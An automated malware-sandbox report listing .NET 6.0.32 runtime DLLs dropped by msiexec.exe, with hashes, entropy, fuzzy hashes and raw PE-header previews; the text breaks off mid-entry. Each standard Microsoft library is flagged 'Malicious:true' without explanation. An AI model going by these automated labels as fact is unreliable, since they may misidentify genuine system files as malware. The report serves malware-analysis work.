                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16656
                                                                                                                                                                                                                                        Entropy (8bit):6.719664758889804
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:KlLKpWniklpFWTYA6VFHRN7eRxB+R9zrPGXMBu:KlcFCleRxw9zbVu
                                                                                                                                                                                                                                        MD5:6D61C8D8F949F7899E5BDF02A9186D52
                                                                                                                                                                                                                                        SHA1:3BF8837A00B740FEC56E538BBE0758323E6BE5EE
                                                                                                                                                                                                                                        SHA-256:1765BF825BD322CD3F2C9C4F282F6B4B2874AB5F54424CF88BAFDCF3806B650D
                                                                                                                                                                                                                                        SHA-512:F3219549CC1222130D4560C06EEDAD0D393F2C5F3456638FA8990D47D919BF69BB5895E2E64CEFB24057F257219B9F9BDC7946D930C098AD6E01ED37CD297607
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..............,... ...@....... ..............................o.....`..................................,..O....@...................)...`.......+..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P ......................H+......................................BSJB............v4.0.30319......l.......#~..<...X...#Strings............#US.........#GUID.......P...#Blob............T.........3..........................................o...........w...7.w...v.d...........U.........~.....B.................a...................................".....\.H.....w.................^.....^.....^...).^...1.^...9.^...A.^...I.^...Q.^...Y.^...a.^...i.^...q.^...y.^.....^. ...^.....^...

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.CodePages.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):871072
                                                                                                                                                                                                                                        Entropy (8bit):7.503965752504184
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:C47xn7kZQ6kliVreJIHHr0tRYbKr2KtG9VKABC6rPOREDfP7/1qilhhWn8:CK9km6k/IwRYbiBeKGCtREDrZlLI8
                                                                                                                                                                                                                                        MD5:A297FAD4F040D3BE6A776823222370A1
                                                                                                                                                                                                                                        SHA1:7B21ABDAC2864A1D23580028F106ADC07D7FF079
                                                                                                                                                                                                                                        SHA-256:4C10D3F1879DCB256A5F55A4975160CB01D87B0857A71BB76C5D1B94D9735C58
                                                                                                                                                                                                                                        SHA-512:E0926A9C29E7FFDFBF6054A73CF5E0A102ECC8E1C0833E3AD67EB0F519D0D26B2C704292C19D66548AEAE1A4D49FC548CAC7D7426CB48FE5476343196D639D7A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...EL*..........." .........&...............................................P.......f....`...@......@............... ......................................LJ..L...."...(...@......."..T...............................................................H............text............................... ..`.data.... ......."..................@....reloc.......@......................@..B............................................0...........................D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.........C.o.m.m.e.n.t.s...I.n.t.e.r.n.a.l. .i.m.p.l.e.m.e.n.t.a.t.i.o.n. .p.a.c.k.a.g.e. .n.o.t. .m.e.a.n.t. .f.o.r. .d.i.r.e.c.t. .c.o.n.s.u.m.p.t.i.o.n... .P.l.e.a.s.e. .d.o. .n.o.t. .r.e.f.e.r.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.713017326605703
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:RTZv49xxhXW6aJWA0MpWjA6Kr4PFHnhWgN7awW9xu3O6YX01k9z3ACTEmv:Rtv0XXW6aJWCYA6VFHRN7MR9zpTr
                                                                                                                                                                                                                                        MD5:9BA8E74518DE0D3C89CFD095D76774B3
                                                                                                                                                                                                                                        SHA1:4D5C19C83AAF0358557302598B305C92245FEEAD
                                                                                                                                                                                                                                        SHA-256:B577A2571AF2A31531E7AC1F42AD0E82D9ED6F0C51C91DBCEAE151974FA9D733
                                                                                                                                                                                                                                        SHA-512:A5F03F6F7E9D80662EB904E52A362269964AC2BA7D7821CEE86330BE80CD55599FF929DCB041870CA9EA10332503992CFB6AF74AF7CF78E4067D71688577D436
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...^............."!..0.............n*... ........@.. ...............................<....`..................................*..O....@...................(...`......\)..8............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P*......H........ ......................P .......................................E....W..H...ln...5.c..h..+}.-.. W..X...>btG..!..J...^`.[...zj..65.K..*n<.>.NG*y........3F...(o.p.X??}.qH..I.c..:.9.*8.BSJB............v4.0.30319......`... ...#~......H...#Strings............#GUID...........#Blob......................3......................................v.........I...........b.............H.........$.....b...........H...................................i.....v...................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encoding.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.76321590690436
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:Rc+gBIocxxXUWfONWjypWjA6Kr4PFHnhWgN7awWtH2Wxu3O6YX01k9z3AC/Uf:SGNUWfONWOYA6VFHRN762gR9zp/Uf
                                                                                                                                                                                                                                        MD5:DE2D5FFC7DA3DDC810E5AE721879C79A
                                                                                                                                                                                                                                        SHA1:0017D411EA8D53ACF3286062344AE92966B74D71
                                                                                                                                                                                                                                        SHA-256:2A004633F91DC186CB645312BDB34B8148244BF65D9F4EF64EA0272581DF0E00
                                                                                                                                                                                                                                        SHA-512:0C24AD14FF77A63B3A829EFBBA88E5C9DF6DD74E30AE6BABF9F4F05B5F986BCAFA1572835BD20E49B5560919B313FF4EFC6862ACEF3707BE8FD73495A75F0120
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............."!..0..............+... ........@.. ..............................P.....`.................................P+..K....@...................(...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P .......................................3.f..v.........M?|.Qh.d..9i.h].*...c2.."..f...0......5...4..%.`j.L.....~P.S.M.....y...Y...x.....0..|.!.:....... |........6BSJB............v4.0.30319......`.......#~..........#Strings............#GUID...,.......#Blob......................3................................................"...........;...........f.............................!...........[.......................B.....O.....v.............

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Encodings.Web.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):131232
                                                                                                                                                                                                                                        Entropy (8bit):6.509086593989503
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:mx6SikhsB8/IZL15zgxiFS2NjNc2aBor8c5qUCNr6iAoAnlJH9RCbFAgynBRg9Pl:mx68p/UjfYxSwKqqOAl/RNlnzg9Ra41x
                                                                                                                                                                                                                                        MD5:7D2E013F3006010DB2765A9FEFF1B6D8
                                                                                                                                                                                                                                        SHA1:E2C9523830A3CE2D5F600303307527A1C509F05B
                                                                                                                                                                                                                                        SHA-256:4399526804152950F4BBE11411495790A03DE100EE484E42E0E35F5E211C045C
                                                                                                                                                                                                                                        SHA-512:3191D9C4EFB3DC14D8BF13349A10DDED28E7647628ECE3722B0CF2656A8F1F135936A6713C5A685A701B6ECE4278EC57C4BC4FABD3B56A65D5EA00FDFECFF59A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...n............" ......................................................................`...@......@............... .......................................0...........(......,...h...T...............................................................H............text............................... ..`.data...K...........................@....reloc..,...........................@..B............................................0...........................\.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...Z.!...C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .t.y.p.e.s. .f.o.r. .e.n.c.o.d.i.n.g. .a.n.d. .e.s.c.a.p.i.n.g. .s.t.r.i.n.g.s. .f.o.r. .u.s.e. .i.n. .J.a.v.a.S.c.r.i.p.t.,. .H.y.p.e.r.T.e.x.t. .M.a.r.k.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.Json.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1483016
                                                                                                                                                                                                                                        Entropy (8bit):6.815422206418889
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:6I8nUX27d6bHUw33pdQh6I1T3bpbh4kiiqggS:6Ip4EP3pWh6ybfn
                                                                                                                                                                                                                                        MD5:DF5F08F791218A56DF0814A523EF6140
                                                                                                                                                                                                                                        SHA1:9660F398F01ED1E856EB88C3C7EE4DF56875FFE4
                                                                                                                                                                                                                                        SHA-256:FDA5F4C3C49C7DD89A973B85FD369286B174604BBA731777C6C84D10C688E135
                                                                                                                                                                                                                                        SHA-512:26ABDBAC88C09E847B9B005982D709D1CC0D6AEFC58D09D98944BD7A04CDB75A6DFAA2E3B573C837906BF2C15D19A3452396A2FFE31937196FC0A3701F71FA6D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....)............" .........H............................................................`...@......@............... ..............................................x...)...p.......P..T...............................................................H............text....-.......................... ..`.data...&-...@.......0..............@....reloc.......p.......^..............@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0.....I...C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .h.i.g.h.-.p.e.r.f.o.r.m.a.n.c.e. .a.n.d. .l.o.w.-.a.l.l.o.c.a.t.i.n.g. .t.y.p.e.s. .t.h.a.t. .s.e.r.i.a.l.i.z.e. .o.b.j.e.c.t.s. .t.o. .J.a.v.a.S.c.r.i.p.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Text.RegularExpressions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):530080
                                                                                                                                                                                                                                        Entropy (8bit):6.7790299482557845
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:ojaCSWfE1hvpmzn7z/HpVxn87bC/m+VvHKHhiKpwR4wcMPVZ22R3+yLAR6Bt:bW2Yzn7z/HpVxn87e/m6CHhUPVZ2qjLd
                                                                                                                                                                                                                                        MD5:E1BD563427583B969B5CD81AE03CF21C
                                                                                                                                                                                                                                        SHA1:F0951B08E22C3A111ED6551CFF96CA65BC68D5D5
                                                                                                                                                                                                                                        SHA-256:32BDA8FBC0E27628E5960023F9B3497474AD45BE38A26DB91DDCF994AEA58023
                                                                                                                                                                                                                                        SHA-512:AEF13497EC93C68AC4714FA6D1584BA3FFB05035483A1AD51F2F56272F530E4A8F830201151321DB85EA31E31EF86609FFD69115180931169CCC78FF8051305D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .....|...p......................................................."....`...@......@............... ......................................|...|).......(..........0)..T...............................................................H............text....z.......|.................. ..`.data....f.......h...~..............@....reloc..............................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...V.....C.o.m.m.e.n.t.s...S.y.s.t.e.m...T.e.x.t...R.e.g.u.l.a.r.E.x.p.r.e.s.s.i.o.n.s.....L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...f.....F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Channels.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):125208
                                                                                                                                                                                                                                        Entropy (8bit):6.6926595622420795
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:EWHXI3rkKaiG9fxBFXRPxlhzKhtTwg8AHWDV5ydNLnM:H33Z95BFXRplhOzwDDUNQ
                                                                                                                                                                                                                                        MD5:9FAC44D3F1D3714F6BCDECBC911BF634
                                                                                                                                                                                                                                        SHA1:F5FCA532CD5A29E9F41FE5FEEEB5CD1EABA42DFD
                                                                                                                                                                                                                                        SHA-256:6C05C1BF3E425FE11833522D910EC9474345102E794CB3C4A05377F28DEB0D5E
                                                                                                                                                                                                                                        SHA-512:262065DF3C55D85629E9A57AFFEC41E4DF8AF5577131F5318124AB8D9B68894A1EC8D788CAC0A25596C6D20B50B9BAC0D2DE9E5B098D034FC14CA9558D43F7D3
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................." .........*............................................................`...@......@............... ......................................T7...........)..............T...............................................................H............text............................... ..`.data....%.......&..................@....reloc..............................@..B............................................0...........................8.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o...t.....0.0.0.0.0.4.b.0...8.....C.o.m.m.e.n.t.s...P.r.o.v.i.d.e.s. .t.y.p.e.s. .f.o.r. .p.a.s.s.i.n.g. .d.a.t.a. .b.e.t.w.e.e.n. .p.r.o.d.u.c.e.r.s. .a.n.d. .c.o.n.s.u.m.e.r.s...........C.o.m.m.o.n.l.y. .U.s.e.d. .T.y.p.e.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Overlapped.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.7130883870672715
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:6NB+HYCHjXuHVdHDH/WcwHWqYA6VFHRN7KmZR9zpvl:sQnhFClKmT9zH
                                                                                                                                                                                                                                        MD5:0571ACC76195386BB9D7FEFCF854C263
                                                                                                                                                                                                                                        SHA1:51C8E70BE147A9C82D49B26B5FBE9BD2EF8369CD
                                                                                                                                                                                                                                        SHA-256:0199A3E5BC94A8DDDD07EF619683B1831B13084BDCB44D30CDF959A567B69A59
                                                                                                                                                                                                                                        SHA-512:EF886BE55AEF9293A2259433C4FBB405F8BDA6A67025E235D612AC341B1A8AB3920A8B59F3E87E466300A8EC62C5813C6673F268311C967C98590061ACF2F17D
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....*............"!..0.............n*... ........@.. ..............................-.....`..................................*..W....@...................(...`......\)..8............................................ ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P*......H........ ......................P ......................................!.z.e'C.._.o..p..Z.b..K1.V.F.X...J..z..'F......d.+...0..."..._._.....k...m~^biT....l*......(......4y9.bV?P...Q.>...c.....vBSJB............v4.0.30319......`.......#~..x...H...#Strings............#GUID...........#Blob......................3......................................................4...........7.......c.........t.....}.......c...V.....{.................9.....................................

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Dataflow.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):505624
                                                                                                                                                                                                                                        Entropy (8bit):6.776900991764264
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:6144:95En4vc03uPIhST/NO/bT8jM5REzxEQRChwMeVB8v3Gu/L2SJESGskfT5v3P4m9J:95sEqChwMyB8fGdSSvBb5v3xeNEd
                                                                                                                                                                                                                                        MD5:BE2332F27FECA6E279C382151EB1F6B1
                                                                                                                                                                                                                                        SHA1:31E2F490BA6EC094FC894480D18D62FDC32993B8
                                                                                                                                                                                                                                        SHA-256:A42B2F43B7CEA67E6ED83EAAF02A487EF22EE4891ED355654B899CE9C5D3062B
                                                                                                                                                                                                                                        SHA-512:05962BCCD50DA22CD9500C3F57D4AB86BD351AD6069F30B494E3DB7DB5841FC0689092DD2C7243A11A0A853B763121EE6CA9F3B3CD693B7D3FD6BD9F05234C98
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...(............." ......................................................................`...@......@............... ..................................l.......HB.......)..........x"..T...........................................................p...H............text............................... ..`.data...J...........................@....reloc..............................@..B............................................0.......................\.....4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n.........t.....S.t.r.i.n.g.F.i.l.e.I.n.f.o...P.....0.0.0.0.0.4.b.0.........C.o.m.m.e.n.t.s...T.P.L. .D.a.t.a.f.l.o.w. .p.r.o.m.o.t.e.s. .a.c.t.o.r./.a.g.e.n.t.-.o.r.i.e.n.t.e.d. .d.e.s.i.g.n.s. .t.h.r.o.u.g.h. .p.r.i.m.i.t.i.v.e.s. .f.o.r. .i.n.-.p.r.o.c.e.s.s. .m.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Extensions.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                                        Entropy (8bit):6.806161371697177
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:sz05p091rcmeD9RhGWSgXWhX6HRN750gv/6fR9z+AnVRZdn:sgAkZ6W5O9zhnLn
                                                                                                                                                                                                                                        MD5:2E73D00493B815F11A05C3F63CD4C0DF
                                                                                                                                                                                                                                        SHA1:24EA414EEF67A44D342CBAB0E154E4A6F8AF1E7B
                                                                                                                                                                                                                                        SHA-256:CF03542DBC9EE66F39B1F7FF1F3C140FFDEB95995D852E2491EF347F291C2957
                                                                                                                                                                                                                                        SHA-512:C9A9446033D4948AAFD99BB22CFA2C9D877CFAFAE63709229C6D12CAF087BEC8FDE12E6AECDBCFBE646065CCB5C55C80927680DFE4DB74D8DC96A03565CBC8FD
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"!..0..............+... ........@.. ....................................`..................................+..K....@...................(...`.......*..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........ ......................P ......................................a.J..!....>..@..b..=..7u..E...D.b.......Y ~...s=,P&.A......n6.PX......@.._;.{f.....Gw.x.UY....Q......m..x..%J.3e.C.1.Q.W.)BSJB............v4.0.30319......`.......#~......8...#Strings....(.......#GUID...8.......#Blob......................3..................................................z...v.z.....H...............G.......[.....[...............]..........._...........9................./.z.....p.....

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.Parallel.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):139024
                                                                                                                                                                                                                                        Entropy (8bit):6.704071507025856
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:Sd+D1EGnNfGAKUDXxT3LBzdQZ4/FJg9G5jR291oVcJ5u5:u0yGNGAKUbxxzKZ0UaC5M
                                                                                                                                                                                                                                        MD5:871F001E647F2E6D7551532D9EE70D2D
                                                                                                                                                                                                                                        SHA1:54CF7E2831EE44826FC58235C3061CB51C2FEAFB
                                                                                                                                                                                                                                        SHA-256:5B1A7C891F6ADD857693B9714C56557F1001157F563E6FEF52379FA78EA5BFE8
                                                                                                                                                                                                                                        SHA-512:6D54B13688A72FA3291FA696B9525A4FAB7C50F35C35935F08AD5E326ECE4E15B4F1DE379F9B85BD69D543407662115ED26D94EB5C83E09CAE0DF2B644A61835
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...Q[U..........." .........*............................................... .......!....`...@......@............... .......................................;..(........)..............T...............................................................H............text...b........................... ..`.data....%.......&..................@....reloc..............................@..B............................................0...........................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O..................z........ .?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...X. ...C.o.m.m.e.n.t.s...S.y.s.t.e.m...T.h.r.e.a.d.i.n.g...T.a.s.k.s...P.a.r.a.l.l.e.l...L.....C.o.m.p.a.n.y.N.a.m.e.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n...h. ...F.i.l.e.D.e.s.c.r.i.p.t.i.

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Tasks.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17176
                                                                                                                                                                                                                                        Entropy (8bit):6.719573029193257
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:xKJvCj4AG3tNKouqFC+TD9WHszWhEX6HRN7tce2R9zEc1C:xKNCj4LNHuk9WfK9zHA
                                                                                                                                                                                                                                        MD5:197A66A19CA592B21A8FF96863C5F0C0
                                                                                                                                                                                                                                        SHA1:E6C06A1E76583E2DA4705EF43875F955296EB039
                                                                                                                                                                                                                                        SHA-256:0DAFA5A7D8311AA41E2E40CA3E279D8ED46B8723F7AC871ADD9FBC9CFD728292
                                                                                                                                                                                                                                        SHA-512:A01233DE285889C9577E632B20F882D695C99338200F31C832EB6C8468E81F5F01E497C576E831AB23EA2E4DF78D8A248443546FCA95BBA490792A043FF2AF09
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0............../... ........@.. ....................................`.................................h/..S....@...................)...`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................./......H........ ......................P ........................................L...j......%g S.....|.1jvF'..V.Ht..E.>Zu.[.;M..U|..&..(.(V|]..............cn&z# Pzl.b...."......v.}..y..J=g.~..w.''H..BSJB............v4.0.30319......`...P...#~......|...#Strings....,.......#GUID...<.......#Blob......................3................................/.....Y.........\.7.....7...u.....W.......&.....t...7.....@...........[...................................|.............7...........

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.Thread.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16032
                                                                                                                                                                                                                                        Entropy (8bit):6.743184429618755
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:hz2EoZVkD4WcU7WlYA6VFHRN7zErtHNsAR9z/4K:FwuGFClzKts89zQK
                                                                                                                                                                                                                                        MD5:42EAEAB968F6373477713CA452CFAAEB
                                                                                                                                                                                                                                        SHA1:E0AD261919F5810907B3359E586A00EC80A94804
                                                                                                                                                                                                                                        SHA-256:B25C3DC708B65DE0393F7E450105A71B480F2A5D1F8CF0E8C8580E20A5FBCBB0
                                                                                                                                                                                                                                        SHA-512:26757C8388B3D2751138F136D25110AF43ECEAF4CD2F01D5D2F113E7990F0CB98C3832B767E91F283FA215394C278365CA19C5C397641F105B325B8088063FB8
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."!..0.............>+... ........@.. ..............................Ve....`..................................*..W....@...................(...`......4*..8............................................ ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ +......H........ ..d...................P .........................................~?....._h.ys.N.../.8..A......h.Y...Z...C..8..fW...$.........4v..\.48F.H.L.=..-7}...._..P.]..0?.$..}.d.xX.%\.......S.._MBSJB............v4.0.30319......`.......#~..........#Strings............#GUID...........#Blob......................3......................................].........U.@.....@...n.....`.............y...0.!...9.!.........T...................................u.............@...........

                                                                                                                                                                                                                                        C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.32\System.Threading.ThreadPool.dll

                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                        Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
